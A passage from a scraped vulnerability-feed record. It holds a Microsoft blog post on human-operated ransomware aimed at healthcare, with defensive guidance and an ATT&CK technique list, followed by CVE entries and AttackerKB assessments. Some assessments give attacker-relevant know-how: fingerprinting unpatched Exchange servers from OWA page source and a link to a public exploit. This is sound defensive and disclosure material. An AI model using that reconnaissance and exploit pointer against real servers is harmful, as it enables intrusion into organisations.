this breach. Using indicators of compromise (IOCs) alone to determine impact from these threats is not a durable solution, as most of these ransomware campaigns employ \u201cone-time use\u201d infrastructure for campaigns, and often change their tools and systems once they determine the detection capabilities of their targets. Detections and mitigations should concentrate on holistic behavioral based hunting where possible, and hardening infrastructure weaknesses favored by these attackers as soon as possible.\n\n### Investigate affected endpoints and credentials\n\nInvestigate endpoints affected by these attacks and identify all the credentials present on those endpoints. Assume that these credentials were available to attackers and that all associated accounts are compromised. Note that attackers can not only dump credentials for accounts that have logged on to interactive or RDP sessions, but can also dump cached credentials and passwords for service accounts and scheduled tasks that are stored in the LSA Secrets section of the registry.\n\n * For endpoints onboarded to [Microsoft Defender ATP](<https://www.microsoft.com/en-us/microsoft-365/windows/microsoft-defender-atp>), use advanced hunting to identify accounts that have logged on to affected endpoints. The threat analytics report contains a hunting query for this purpose.\n * Otherwise, check the Windows Event Log for post-compromise logons\u2014those that occur after or during the earliest suspected breach activity\u2014with event ID 4624 and logon type 2 or 10. For any other timeframe, check for logon type 4 or 5.\n\n### Isolate compromised endpoints\n\nIsolate endpoints that have command-and-control beacons or have been lateral movement targets. Locate these endpoints using advanced hunting queries or other methods of directly searching for related IOCs. [Isolate machines](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/respond-machine-alerts#isolate-machines-from-the-network>) using Microsoft Defender ATP, or use other data sources, such as NetFlow, and search through your SIEM or other centralized event management solutions. Look for lateral movement from known affected endpoints.\n\n### Address internet-facing weaknesses\n\nIdentify perimeter systems that attackers might have utilized to access your network. You can use a public scanning interface, such as [_shodan.io_](<https://www.shodan.io/>), to augment your own data. Systems that should be considered of interest to attackers include:\n\n * RDP or Virtual Desktop endpoints without MFA\n * Citrix ADC systems affected by CVE-2019-19781\n * Pulse Secure VPN systems affected by CVE-2019-11510\n * Microsoft SharePoint servers affected by CVE-2019-0604\n * Microsoft Exchange servers affected by CVE-2020-0688\n * Zoho ManageEngine systems affected by CVE-2020-10189\n\nTo further reduce organizational exposure, Microsoft Defender ATP customers can use the [Threat and Vulnerability Management (TVM)](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/next-gen-threat-and-vuln-mgt>) capability to discover, prioritize, and remediate vulnerabilities and misconfigurations. TVM allows security administrators and IT administrators to collaborate seamlessly to remediate issues.\n\n### Inspect and rebuild devices with related malware infections\n\nMany ransomware operators enter target networks through existing infections of malware like Emotet and Trickbot. These malware families, traditionally considered to be banking trojans, have been used to deliver all kinds of payloads, including persistent implants. Investigate and remediate any known infections and consider them possible vectors for sophisticated human adversaries. Ensure that you check for exposed credentials, additional payloads, and lateral movement prior to rebuilding affected endpoints or resetting passwords.\n\n## Building security hygiene to defend networks against human-operated ransomware\n\nAs ransomware operators continue to compromise new targets, defenders should proactively assess risk using all available tools. You should continue to enforce proven preventive solutions\u2014credential hygiene, minimal privileges, and host firewalls\u2014to stymie these attacks, which have been consistently observed taking advantage of security hygiene issues and over-privileged credentials.\n\nApply these measures to make your network more resilient against new breaches, reactivation of dormant implants, or lateral movement:\n\n * Randomize local administrator passwords using a tool such as LAPS.\n * Apply [Account Lockout Policy](<https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/account-lockout-policy>).\n * Ensure good perimeter security by patching exposed systems. Apply mitigating factors, such as MFA or vendor-supplied mitigation guidance, for vulnerabilities.\n * Utilize [host firewalls to limit lateral movement](<https://support.microsoft.com/en-us/help/3185535/preventing-smb-traffic-from-lateral-connections>). Preventing endpoints from communicating on TCP port 445 for SMB will have limited negative impact on most networks, but can significantly disrupt adversary activities.\n * Turn on cloud-delivered protection for Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a huge majority of new and unknown variants.\n * Follow standard guidance in the [security baselines](<https://techcommunity.microsoft.com/t5/microsoft-security-baselines/bg-p/Microsoft-Security-Baselines>) for Office and Office 365 and the Windows security baselines. Use [Microsoft Secure Score](<https://docs.microsoft.com/en-us/microsoft-365/security/mtp/microsoft-secure-score-preview>) assesses to measures security posture and get recommended improvement actions, guidance, and control.\n * Turn on [tamper protection](<https://techcommunity.microsoft.com/t5/Microsoft-Defender-ATP/Tamper-protection-now-generally-available-for-Microsoft-Defender/ba-p/911482>) features to prevent attackers from stopping security services.\n * Turn on [attack surface reduction rules](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction>), including rules that can block ransomware activity: \n * Use advanced protection against ransomware\n * Block process creations originating from PsExec and WMI commands\n * Block credential stealing from the Windows local security authority subsystem (lsass.exe)\n\nFor additional guidance on improving defenses against human-operated ransomware and building better security posture against cyberattacks in general, read [Human-operated ransomware attacks: A preventable disaster](<https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/>).\n\n## Microsoft Threat Protection: Coordinated defense against complex and wide-reaching human-operated ransomware\n\nWhat we\u2019ve learned from the increase in ransomware deployments in April is that attackers pay no attention to the real-world consequences of disruption in services\u2014in this time of global crisis\u2014that their attacks cause.\n\nHuman-operated ransomware attacks represent a different level of threat because adversaries are adept at systems administration and security misconfigurations and can therefore adapt to any path of least resistance they find in a compromised network. If they run into a wall, they try to break through. And if they can\u2019t break through a wall, they\u2019ve shown that they can skillfully find other ways to move forward with their attack. As a result, human-operated ransomware attacks are complex and wide-reaching. No two attacks are exactly the same.\n\n[Microsoft Threat Protections (MTP)](<https://www.microsoft.com/en-us/security/technology/threat-protection>) provides coordinated defenses that uncover the complete attack chain and help block sophisticated attacks like human-operated ransomware. MTP combines the capabilities of multiple Microsoft 365 security services to orchestrate protection, prevention, detection, and response across endpoints, email, identities, and apps.\n\nThrough built-in intelligence, automation, and integration, MTP can block attacks, eliminate their persistence, and auto-heal affected assets. It correlates signals and consolidates alerts to help defenders prioritize incidents for investigation and response. MTP also provides a unique cross-domain hunting capability that can further help defenders identify attack sprawl and get org-specific insights for hardening defenses.\n\nMicrosoft Threat Protection is also part of a [chip-to-cloud security approach](<https://www.microsoft.com/security/blog/2020/03/17/secured-core-pcs-a-brief-showcase-of-chip-to-cloud-security-against-kernel-attacks/>) that combines threat defense on the silicon, operating system, and cloud. Hardware-backed security features on Windows 10 like address space layout randomization (ASLR), Control Flow Guard (CFG), and others harden the platform against many advanced threats, including ones that take advantage of vulnerable kernel drivers. These platform security features seamlessly integrate with Microsoft Defender ATP, providing end-to-end security that starts from a strong hardware root of trust. On [Secured-core PCs](<https://www.microsoft.com/en-us/windowsforbusiness/windows10-secured-core-computers>) these mitigations are enabled by default.\n\nWe continue to work with our customers, partners, and the research community to track human-operated ransomware and other sophisticated attacks. For dire cases customers can use available services like the [Microsoft Detection and Response (DART) team](<https://www.microsoft.com/security/blog/microsoft-detection-and-response-team-dart-blog-series/>) to help investigate and remediate.\n\n \n\n_Microsoft Threat Protection Intelligence Team_\n\n \n\n## Appendix: MITRE ATT&amp;CK techniques observed\n\nHuman-operated ransomware campaigns employ a broad range of techniques made possible by attacker control over privileged domain accounts. The techniques listed here are techniques commonly used during attacks against healthcare and critical services in April 2020.\n\nCredential access\n\n * [T1003 Credential Dumping](<https://attack.mitre.org/techniques/T1003/>) | Use of LaZange, Mimikatz, LsaSecretsView, and other credential dumping tools and exploitation of [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) on vulnerable endpoints\n\nPersistence\n\n * [T1084 Windows Management Instrumentation Event Subscription](<https://attack.mitre.org/techniques/T1084/>) | WMI event subscription\n * [T1136 Create Account](<https://attack.mitre.org/techniques/T1136/>) | Creation of new accounts for RDP\n\nCommand and control\n\n * [T1043 Commonly Used Port](<https://attack.mitre.org/techniques/T1043/>) | Use of port 443\n\nDiscovery\n\n * [T1033 System Owner/User Discovery](<https://attack.mitre.org/techniques/T1033/>) | Various commands\n * [T1087 Account Discovery](<https://attack.mitre.org/techniques/T1087/>) | LDAP and AD queries and other commands\n * [T1018 Remote System Discovery](<https://attack.mitre.org/techniques/T1018/>) | Pings, qwinsta, and other tools and commands\n * [T1482 Domain Trust Discovery](<https://attack.mitre.org/techniques/T1482/>) | Domain trust enumeration using Nltest\n\nExecution\n\n * [T1035 Service Execution](<https://attack.mitre.org/techniques/T1035/>) | Service registered to run CMD (as ComSpec) and PowerShell commands\n\nLateral movement\n\n * [T1076 Remote Desktop Protocol](<https://attack.mitre.org/techniques/T1076/>) | Use of RDP to reach other machines in the network\n * [T1105 Remote File Copy](<https://attack.mitre.org/techniques/T1105/>) | Lateral movement using WMI and PsExec\n\nDefense evasion\n\n * [T1070 Indicator Removal on Host](<https://attack.mitre.org/techniques/T1070/>) | Clearing of event logs using wevutil, removal of USNJournal using fsutil, and deletion of slack space on drive using cipher.exe\n * [T1089 Disabling Security Tools](<https://attack.mitre.org/techniques/T1089/>) | Stopping or tampering with antivirus and other security using ProcessHacker and exploitation of vulnerable software drivers\n\nImpact\n\n * [T1489 Service Stop](<https://attack.mitre.org/techniques/T1489/>) | Stopping of services prior to encryption\n * [T1486 Data Encrypted for Impact](<https://attack.mitre.org/techniques/T1486/>) | Ransomware encryption\n\nThe post [Ransomware groups continue to target healthcare, critical services; here\u2019s how to reduce risk](<https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/>) appeared first on [Microsoft Security.", "published": "2020-04-28T16:00:49", "modified": "2020-04-28T16:00:49", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/", "reporter": "Eric Avena", "references": [], "cvelist": ["CVE-2019-0604", "CVE-2019-11510", "CVE-2019-19781", "CVE-2020-0688", "CVE-2020-10189"], "lastseen": "2020-04-28T16:07:14", "history": [], "viewCount": 32, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-10189", "CVE-2020-0688", "CVE-2019-0604", "CVE-2019-19781", "CVE-2019-11510"]}, {"type": "attackerkb", "idList": ["AKB:B8A2FA01-8796-4335-8BF4-45147E14AFC9", "AKB:AFC76977-D355-470D-A7F6-FEF7A8352B65"]}, {"type": "nessus", "idList": ["FREEBSD_PKG_2BAB995F36D411EA9DAD002590ACAE31.NASL", "CITRIX_NETSCALER_CTX267027.NASL", "MANAGEENGINE_DESKTOP_CENTRAL_100479.NASL", "PULSE_CONNECT_SECURE-CVE-2019-11510.NASL"]}, {"type": "symantec", "idList": ["SMNTC-111238", "SMNTC-106914"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:82E24C28622F0C96140EDD88C6BD8F54"]}, {"type": "hackerone", "idList": ["H1:536134", "H1:671749"]}, {"type": "threatpost", "idList": ["THREATPOST:B53DDA5AD9C6530F631391E064A0D4FA", "THREATPOST:199785A97C530FECDF2B53B871FBE1C2", "THREATPOST:4C22D22EF8F65F5DA108A15C99CB9F55", "THREATPOST:BD8DD789987BFB9BE93AA8FD73E98B40", "THREATPOST:B047BB0FECBD43E30365375959B09B04", "THREATPOST:68F4D33A0EE100B39416EDC76C3A3C9F", "THREATPOST:06C5D9E6950186757AA989F2557336B3", "THREATPOST:7E76268AD6AABF30EEE441619FF98ABF", "THREATPOST:DF7C78725F19B2637603E423E56656D4", "THREATPOST:AB0F3CD65F9FE00689C1695CB89ADC3F"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154176", "PACKETSTORM:156592", "PACKETSTORM:156730", "PACKETSTORM:155947", "PACKETSTORM:155930", "PACKETSTORM:155904", "PACKETSTORM:155972", "PACKETSTORM:156620", "PACKETSTORM:155905"]}, {"type": "zdt", "idList": ["1337DAY-ID-34095", "1337DAY-ID-33794", "1337DAY-ID-33140", "1337DAY-ID-33824", "1337DAY-ID-34037", "1337DAY-ID-34051", "1337DAY-ID-33806", "1337DAY-ID-33951"]}, {"type": "exploitdb", "idList": ["EDB-ID:48168", "EDB-ID:47930", "EDB-ID:47901", "EDB-ID:48224", "EDB-ID:47297", "EDB-ID:48153", "EDB-ID:48053"]}, {"type": "thn", "idList": ["THN:46994B7A671ED65AD9975F25F514C6E3", "THN:9994A9D5CFB76851BB74C8AD52F3DBBE", "THN:166AAAF7F04EF01C9E049500387BD1FD", "THN:6ED39786EE29904C7E93F7A0E35A39CB"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/HTTP/CITRIX_DIR_TRAVERSAL", "MSF:EXPLOIT/WINDOWS/HTTP/EXCHANGE_ECP_VIEWSTATE", "MSF:AUXILIARY/GATHER/PULSE_SECURE_FILE_DISCLOSURE", "MSF:EXPLOIT/LINUX/HTTP/CITRIX_DIR_TRAVERSAL_RCE", "MSF:EXPLOIT/WINDOWS/HTTP/DESKTOPCENTRAL_DESERIALIZATION"]}, {"type": "dsquare", "idList": ["E-688"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:959CB519C011AA90D2BEE4ED33D8FEBF", "EXPLOITPACK:23F64F82AC4F6039E4EBCB303C604A42", "EXPLOITPACK:71F27F0B85E2B8F7A6B9272A3136DA05", "EXPLOITPACK:04BD77915CB7D5152AF289164D21448A", "EXPLOITPACK:213FB88DED3CCAB77D32289A335E386D", "EXPLOITPACK:D0A0C692882848C218FDF1B93258E171"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:5B32671B820EEB03840B798BCEA9FDC8", "MALWAREBYTES:7E03882ED3E2DC3F06ABC3D88D86D4E6"]}, {"type": "mscve", "idList": ["MS:CVE-2019-0604", "MS:CVE-2020-0688"]}, {"type": "freebsd", "idList": ["2BAB995F-36D4-11EA-9DAD-002590ACAE31"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:4124E2CCDA610C6D222319C47C8D3250"]}, {"type": "mskb", "idList": ["KB4462202", "KB4536989", "KB4462199", "KB4462184"]}, {"type": "talosblog", "idList": ["TALOSBLOG:7192A351B37E9A67C1A5DB760A14DA7E", "TALOSBLOG:D7662F18F14544FB63C58CB527CC3A4A"]}, {"type": "cert", "idList": ["VU:619785"]}, {"type": "taosecurity", "idList": ["TAOSECURITY:CF99A8E68CF7727296D8451EE445844C"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:9BC812C1F699A6136F37C0ACE6451F20"]}, {"type": "krebs", "idList": ["KREBS:62E2D32C0ABD1C4B8EA91C60B425255B"]}, {"type": "saint", "idList": ["SAINT:C857C9B9FEF5E0F807DAAB797C3B2D87"]}], "modified": "2020-04-28T16:07:14", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2020-04-28T16:07:14", "rev": 2}}, "objectVersion": "1.4"}, "lastseen": "2020-04-28T16:07:14", "differentElements": ["description"], "edition": 1}], "viewCount": 70, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-0688", "CVE-2019-0604", "CVE-2020-10189"]}, {"type": "attackerkb", "idList": ["AKB:B8A2FA01-8796-4335-8BF4-45147E14AFC9", "AKB:AFC76977-D355-470D-A7F6-FEF7A8352B65"]}, {"type": "nessus", "idList": ["FREEBSD_PKG_2BAB995F36D411EA9DAD002590ACAE31.NASL", "PULSE_CONNECT_SECURE-CVE-2019-11510.NASL", "MANAGEENGINE_DESKTOP_CENTRAL_100479.NASL", "CITRIX_NETSCALER_CTX267027.NASL"]}, {"type": "symantec", "idList": ["SMNTC-111238", "SMNTC-106914"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:82E24C28622F0C96140EDD88C6BD8F54"]}, {"type": "hackerone", "idList": ["H1:534630", "H1:536134", "H1:671749", "H1:680480"]}, {"type": "threatpost", "idList": ["THREATPOST:AB2F6BF7F6EC16383E737E091BA9385B", "THREATPOST:48D622E76FCC26F28B32364668BB1930", "THREATPOST:4F1C35A7D4BE774DF9C88794C793181D", "THREATPOST:FE41B3825C6A9EE91B00CDADD2AF9147", "THREATPOST:7BCCC5B4AA7FB7724466FFAB585EC55D", "THREATPOST:199785A97C530FECDF2B53B871FBE1C2", "THREATPOST:AB0F3CD65F9FE00689C1695CB89ADC3F", "THREATPOST:9688E067E5F287042D4EBC46107C66AF", "THREATPOST:677D5A0A56D06021C8EF30D0361579C6", "THREATPOST:68F4D33A0EE100B39416EDC76C3A3C9F"]}, {"type": "thn", "idList": ["THN:9994A9D5CFB76851BB74C8AD52F3DBBE", "THN:46994B7A671ED65AD9975F25F514C6E3", "THN:6ED39786EE29904C7E93F7A0E35A39CB", "THN:166AAAF7F04EF01C9E049500387BD1FD"]}, {"type": "exploitdb", "idList": ["EDB-ID:47901", "EDB-ID:48224", "EDB-ID:47930", "EDB-ID:48153", "EDB-ID:48053", "EDB-ID:47297", "EDB-ID:48168"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/HTTP/CITRIX_DIR_TRAVERSAL", "MSF:AUXILIARY/GATHER/PULSE_SECURE_FILE_DISCLOSURE", "MSF:EXPLOIT/LINUX/HTTP/CITRIX_DIR_TRAVERSAL_RCE", "MSF:EXPLOIT/WINDOWS/HTTP/DESKTOPCENTRAL_DESERIALIZATION", "MSF:EXPLOIT/WINDOWS/HTTP/EXCHANGE_ECP_VIEWSTATE"]}, {"type": "zdt", "idList": ["1337DAY-ID-33824", "1337DAY-ID-34037", "1337DAY-ID-34095", "1337DAY-ID-33794", "1337DAY-ID-34051", "1337DAY-ID-33140", "1337DAY-ID-33806"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156730", "PACKETSTORM:155905", "PACKETSTORM:154176", "PACKETSTORM:155930", "PACKETSTORM:155904", "PACKETSTORM:155947", "PACKETSTORM:156620", "PACKETSTORM:156592", "PACKETSTORM:155972"]}, {"type": "dsquare", "idList": ["E-688"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:959CB519C011AA90D2BEE4ED33D8FEBF", "EXPLOITPACK:23F64F82AC4F6039E4EBCB303C604A42", "EXPLOITPACK:213FB88DED3CCAB77D32289A335E386D", "EXPLOITPACK:04BD77915CB7D5152AF289164D21448A", "EXPLOITPACK:D0A0C692882848C218FDF1B93258E171", "EXPLOITPACK:71F27F0B85E2B8F7A6B9272A3136DA05"]}, {"type": "talosblog", "idList": ["TALOSBLOG:7192A351B37E9A67C1A5DB760A14DA7E", "TALOSBLOG:D7662F18F14544FB63C58CB527CC3A4A"]}, {"type": "cert", "idList": ["VU:619785"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:7E03882ED3E2DC3F06ABC3D88D86D4E6", "MALWAREBYTES:5B32671B820EEB03840B798BCEA9FDC8"]}, {"type": "freebsd", "idList": ["2BAB995F-36D4-11EA-9DAD-002590ACAE31"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:4124E2CCDA610C6D222319C47C8D3250"]}, {"type": "krebs", "idList": ["KREBS:62E2D32C0ABD1C4B8EA91C60B425255B"]}, {"type": "mskb", "idList": ["KB4462202", "KB4462199", "KB4536989", "KB4462184"]}, {"type": "mscve", "idList": ["MS:CVE-2020-0688", "MS:CVE-2019-0604"]}, {"type": "taosecurity", "idList": ["TAOSECURITY:CF99A8E68CF7727296D8451EE445844C"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:9BC812C1F699A6136F37C0ACE6451F20"]}, {"type": "saint", "idList": ["SAINT:1AF7483E5B4DB373D9449DD910472EA5", "SAINT:C857C9B9FEF5E0F807DAAB797C3B2D87"]}], "modified": "2020-04-30T23:04:13", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2020-04-30T23:04:13", "rev": 2}, "vulnersScore": 7.7}, "objectVersion": "1.4", "_object_type": "robots.models.rss.RssBulletin", "_object_types": ["robots.models.rss.RssBulletin", "robots.models.base.Bulletin"]}

{"cve": [{"lastseen": "2020-03-15T10:30:04", "bulletinFamily": "NVD", "description": "Zoho ManageEngine Desktop Central before 10.0.474 allows remote code execution because of deserialization of untrusted data in getChartImage in the FileStorage class. This is related to the CewolfServlet and MDMLogUploaderServlet servlets.", "modified": "2020-03-09T14:15:00", "id": "CVE-2020-10189", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-10189", "published": "2020-03-06T17:15:00", "title": "CVE-2020-10189", "type": "cve", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-10-17T11:25:39", "bulletinFamily": "NVD", "description": "In Pulse Secure Pulse Connect Secure (PCS) 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4, an unauthenticated remote attacker can send a specially crafted URI to perform an arbitrary file reading vulnerability .", "modified": "2019-10-03T18:15:00", "id": "CVE-2019-11510", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-11510", "published": "2019-05-08T17:29:00", "title": "CVE-2019-11510", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-17T12:46:38", "bulletinFamily": "NVD", "description": "An issue was discovered in Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0. They allow Directory Traversal.", "modified": "2020-01-08T19:15:00", "id": "CVE-2019-19781", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-19781", "published": "2019-12-27T14:15:00", "title": "CVE-2019-19781", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-05T12:27:36", "bulletinFamily": "NVD", "description": "A remote code execution vulnerability exists in Microsoft Exchange software when the software fails to properly handle objects in memory, aka 'Microsoft Exchange Memory Corruption Vulnerability'.", "modified": "2020-02-20T17:15:00", "id": "CVE-2020-0688", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-0688", "published": "2020-02-11T22:15:00", "title": "CVE-2020-0688", "type": "cve", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2019-12-15T00:34:48", "bulletinFamily": "NVD", "description": "A remote code execution vulnerability exists in Microsoft SharePoint when the software fails to check the source markup of an application package, aka 'Microsoft SharePoint Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2019-0594.", "modified": "2019-12-13T15:17:00", "id": "CVE-2019-0604", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-0604", "published": "2019-03-05T23:29:00", "title": "CVE-2019-0604", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "attackerkb": [{"lastseen": "2020-05-30T09:22:04", "bulletinFamily": "info", "description": "An issue was discovered in Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0. They allow Directory Traversal.\n\n**Recent assessments:**\n\n**kevthehermit** at 2020-02-22T00:29:26.765449Z reported:\nAWS had pre built AMIs for these appliances built and supplied to the market place by Citrix. \r\n\r\nAt the time of release and for several weeks afterwards, they were still available in their default vulnerable state. Whilst AWS have removed the vulnerable images any AWS account that subscribed to a specific AMI will still have the default vulnerable version. \r\n\r\nIf you use this kind of setup it is important to remove any old AMIs and replace them, do not assume that patches will be applied to exising AMIs\n\nAssessed Attacker Value: 5\nAssessed Exploitability: 5\n**bcook-r7** at 2020-01-11T19:23:51.380617Z reported:\nThere are now public exploits for this and it is now reliable and low-risk to exploit. More info at https://www.reddit.com/r/blueteamsec/comments/en4m7j/multiple_exploits_for_cve201919781_citrix which is a pretty reasonable approximation for how this AKB entry would ideally look :) Also of note, https://twitter.com/buffaloverflow/status/1216807963974938624 mentions a number of files of interest to an attacker.\n\nAssessed Attacker Value: 5\nAssessed Exploitability: 5\n**zeroSteiner** at 2020-01-02T15:42:04.704918Z reported:\nThis vulnerability [appears](https://support.citrix.com/article/CTX267679) to be based on a web request to a `/vpns/` resource containing a directory traversal reference. The traversal reference seems to grant access to the admin portal. This specifically is blocked by the `skip_systemaccess_policyeval` flag in the [interim fix](https://support.citrix.com/article/CTX267679) published by Citrix. Based on what information is available publicly, the vulnerability can be exploited to gain code execution on the Citrix server without authentication information. This would be very useful to an attacker because it could be exploited remotely, without authentication and due to the nature of Citrix servers often having a lot of traffic which could facilitate an attacker's efforts to obfuscate their activity.\r\n\r\nIn some environments, Cirtix servers may not be patched as frequently as other systems due to their mission critical nature of providing applications for external users. In this case, attackers may have an easier time in escalating their privileges once code execution has been obtained. This would only be necessary if the initial vector did not already yield `NT_AUTHORITY\\SYSTEM` privileges which the current information does not specify.\n\nAssessed Attacker Value: 4\nAssessed Exploitability: 5\n", "modified": "2020-05-30T05:01:44", "published": "2019-12-27T14:30:04", "id": "AKB:AFC76977-D355-470D-A7F6-FEF7A8352B65", "href": "https://attackerkb.com/topics/afc76977-d355-470d-a7f6-fef7a8352b65", "title": "CVE-2019-19781", "type": "attackerkb", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-05-30T09:22:12", "bulletinFamily": "info", "description": "A remote code execution vulnerability exists in Microsoft Exchange software when the software fails to properly handle objects in memory, aka 'Microsoft Exchange Memory Corruption Vulnerability'.\n\n**Recent assessments:**\n\n**ccondon-r7** at 2020-03-06T23:31:22.236669Z reported:\nThere's a Metasploit exploit module out for this now, and pen testers have reported that seeing vulnerable Exchange servers is common on engagements. As zeroSteiner has pointed out on Twitter, all that's needed for reliable code execution is a domain user with a mailbox: https://twitter.com/zeroSteiner/status/1234983584177328129. \r\nTrustedSec has a great write-up on IoCs here: https://www.trustedsec.com/blog/detecting-cve-20200688-remote-code-execution-vulnerability-on-microsoft-exchange-server/\n\n**tsellers-r7** at 2020-03-05T22:29:33.890612Z reported:\n**Discovery Notes**\r\n\r\nYou can determine the version of Microsoft Exchange that the Client Access Servers (CAS) are running prior to authentication. Visit the OWA login page ( `https://owa.probablyunpatched.com/owa/auth/logon.aspx`) and view the source.\r\n\r\n```\r\n@font-face {\r\n font-family: \"Segoe UI WPC\";\r\n src: url(\"/owa/auth/15.0.1210/themes/resources/segoeui-regular.eot?#iefix\") format(\"embedded-opentype\"),\r\n url(\"/owa/auth/15.0.1210/themes/resources/segoeui-regular.ttf\") format(\"truetype\");\r\n}\r\n\r\n@font-face {\r\n font-family: \"Segoe UI WPC Semilight\";\r\n src: url(\"/owa/auth/15.0.1210/themes/resources/segoeui-semilight.eot?#iefix\") format(\"embedded-opentype\"),\r\n url(\"/owa/auth/15.0.1210/themes/resources/segoeui-semilight.ttf\") format(\"truetype\");\r\n}\r\n\r\n@font-face {\r\n font-family: \"Segoe UI WPC Semibold\";\r\n src: url(\"/owa/auth/15.0.1210/themes/resources/segoeui-semibold.eot?#iefix\") format(\"embedded-opentype\"),\r\n url(\"/owa/auth/15.0.1210/themes/resources/segoeui-semibold.ttf\") format(\"truetype\");\r\n}\r\n```\r\n\r\nThe versions there can be compared to the Exchange build lookup list provided by Microsoft\r\nhttps://docs.microsoft.com/en-us/exchange/new-features/build-numbers-and-release-dates?view=exchserver-2019\r\n\r\n**The following Exchange versions _may_ be safe. Microsoft isn\u2019t consistently updating the build number as part of the update installation process. Anything newer is probably patched.**\r\n\r\n|Exchange Release|Build Number|\r\n|---|---|\r\n|Microsoft Exchange Server 2019 Cumulative Update 4 + *hotfix* |15.2.529.xxx|\r\n|Microsoft Exchange Server 2019 Cumulative Update 3 + *hotfix* |15.2.464.xxx|\r\n|Microsoft Exchange Server 2016 Cumulative Update 16 + *hotfix* |15.1.1979.xxx|\r\n|Microsoft Exchange Server 2016 Cumulative Update 15 + *hotfix* |15.1.1913.xxx|\r\n|Microsoft Exchange Server 2016 Cumulative Update 14 + *hotfix* |15.1.1847.xxx|\r\n|Microsoft Exchange Server 2013 Cumulative Update 23 + *hotfix* |15.0.1497.xxx|\r\n|Microsoft Exchange Server 2010 Service Pack 3 Update Rollup 30 |14.3.496.xxx|\r\n\r\n**Any version matching those listed below or that are older than those listed below are _definately_ vulnerable.**\r\n\r\n|Exchange Release|Build Number|\r\n|---|---|\r\n|Microsoft Exchange Server 2019 Cumulative Update 2|15.2.397.3|\r\n|Microsoft Exchange Server 2016 Cumulative Update 14|15.1.1779.2|\r\n|Microsoft Exchange Server 2013 Cumulative Update 22|15.0.1473.3|\r\n|Microsoft Exchange Server 2010 Service Pack 3 Update Rollup 29|14.3.487.0|\r\n\r\n\n\n**J3rryBl4nks** at 2020-03-02T22:11:35.246085Z reported:\nDue to widespread credential stuffing and password spraying attacks, the fact that this is a deserialization RCE due to hard coded encryption keys, the exploit is universally portable.\r\n\r\nThere are also POC scripts that just require you to get valid credentials.\r\n\r\n\n\nAssessed Attacker Value: 5\nAssessed Exploitability: 4\n**jbarto** at 2020-02-28T16:51:39.461029Z reported:\nExchange Servers exposed to the outside (OWA) will need to patch this as soon as possible. Internal Exchange is not a high priority. The requirement of knowing the validation key is required to exploit. There is discussion that a specially crafted email may trigger this vulnerability with the way Exchange handles memory objects which can lead to remote code execution. \r\nSeveral POC are available although the skill level to exploit is higher with the need to write custom code. \r\nRecommended to patch if Exchange is exposed outside of the environment. \r\nThis was patched in the Feb 2020 patch release from Microsoft. \r\nHigh/Critical depending on controls to expose Exchange to the internet.\r\nLow/Moderate for internal Exchange depending on the environment.\n\nAssessed Attacker Value: 5\nAssessed Exploitability: 3\n**theguly** at 2020-02-28T16:45:22.39561Z reported:\njust to add the exploit and proper tag\r\nhttps://github.com/Ridter/cve-2020-0688\r\n\n\nAssessed Attacker Value: 5\nAssessed Exploitability: 5\n**zeroSteiner** at 2020-02-26T17:02:20.412624Z reported:\nThis is a serialization bug in the Exchange Control Panel component of Microsoft Exchange server. The [write 